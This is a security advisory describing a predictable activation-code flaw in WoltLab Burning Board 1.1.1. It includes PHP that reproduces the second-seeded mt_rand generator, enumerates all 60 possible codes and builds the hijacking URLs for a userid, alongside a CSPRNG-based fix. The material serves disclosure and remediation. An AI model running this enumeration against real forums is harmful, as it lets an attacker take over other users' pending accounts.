Title: WoltLab Burning Board Predictable Account Activation String Vulnerability
Severity: MODERATE
Description:
WoltLab Burning Board is a free web-based bulletin board package based on PHP and MySQL.
It is possible to hijack an account that has not yet been activated. When a user creates a new account on a Burning Board forum, they are presented with a link which they must click in order to activate the account, for example:
http://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322
The code parameter is generated by the following PHP:
$datum = date("s");   // current second of the minute, "00".."59"
mt_srand($datum);     // seed the Mersenne Twister with that second only
$z = mt_rand();       // first output becomes the activation code
Because the generator is seeded only with the second of the minute at which the registration request was submitted, there are at most 60 possible seeds and therefore at most 60 possible values for the code, regardless of the userid. The userid itself is a small integer that appears in the activation link. An attacker who knows or guesses the userid of a pending account can simply request the activation URL with each of the 60 candidate codes and activate the account before the legitimate user does, hijacking it.
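The following PHP is an added example written for this page; it is not WoltLab code and does not come from the advisory. It reproduces the weak generator as the advisory describes it, enumerates every code that generator can emit on the PHP build it runs on, builds the 60 activation URLs an attacker would try for a given userid (the host forum.dom and userid 345 are taken from the example link above; the function names are hypothetical), and shows a replacement that draws the code from the CSPRNG. One caveat a practitioner needs: mt_rand() output for a given seed changed in PHP 7.1, so the candidate list must be generated with the same PHP generation as the target, or with the MT_RAND_PHP mode flag (PHP 7.1 and later) to mimic older builds.

```php
<?php
// Added example, not WoltLab code: reproduces the advisory's weak generator,
// enumerates its full output space, and shows a CSPRNG-based replacement.

// The generator as described in the advisory: seeded with the current second.
function weakActivationCode(): int {
    $datum = date("s");       // "00".."59"
    mt_srand((int) $datum);   // only 60 possible seeds
    return mt_rand();
}

// Every code the weak generator can produce on this PHP build, keyed by seed.
// Set $legacy = true on PHP 7.1+ to reproduce the pre-7.1 mt_rand() output.
function weakCodeCandidates(bool $legacy = false): array {
    $codes = [];
    for ($second = 0; $second < 60; $second++) {
        if ($legacy) {
            mt_srand($second, MT_RAND_PHP);
        } else {
            mt_srand($second);
        }
        $codes[$second] = mt_rand();
    }
    return $codes;
}

// The activation URLs an attacker would request for a known userid
// (hypothetical host taken from the advisory's example link).
function activationUrls(int $userid, array $codes): array {
    $urls = [];
    foreach (array_unique($codes) as $code) {
        $urls[] = sprintf(
            'http://forum.dom/forum/action.php?action=activation&userid=%d&code=%d',
            $userid,
            $code
        );
    }
    return $urls;
}

// Replacement: 128 random bits from the CSPRNG, independent of time and userid.
// The server must store this per account and compare it on activation.
function strongActivationCode(): string {
    return bin2hex(random_bytes(16));
}

$codes = weakCodeCandidates();
$now   = weakActivationCode();
printf("weak generator: %d distinct codes possible\n", count(array_unique($codes)));
printf("weak code generated now: %d, in candidate list: %s\n",
    $now, in_array($now, $codes, true) ? 'yes' : 'no');
printf("URLs to try for userid 345: %d\n", count(activationUrls(345, $codes)));
printf("strong code: %s\n", strongActivationCode());
```

Running the script shows the whole attack surface of the weak scheme is the candidate list it prints, and that the code produced "right now" is always one of those entries. The strong variant has 2^128 possible values, so enumeration is no longer an option; the remaining checks a fix should include are a server-side expiry on the code and a constant-time comparison (hash_equals) when it is presented.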
Affected Products:
- WoltLab Burning Board 1.1.1
References:
- CityForFree: CityForFree Product Page
Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.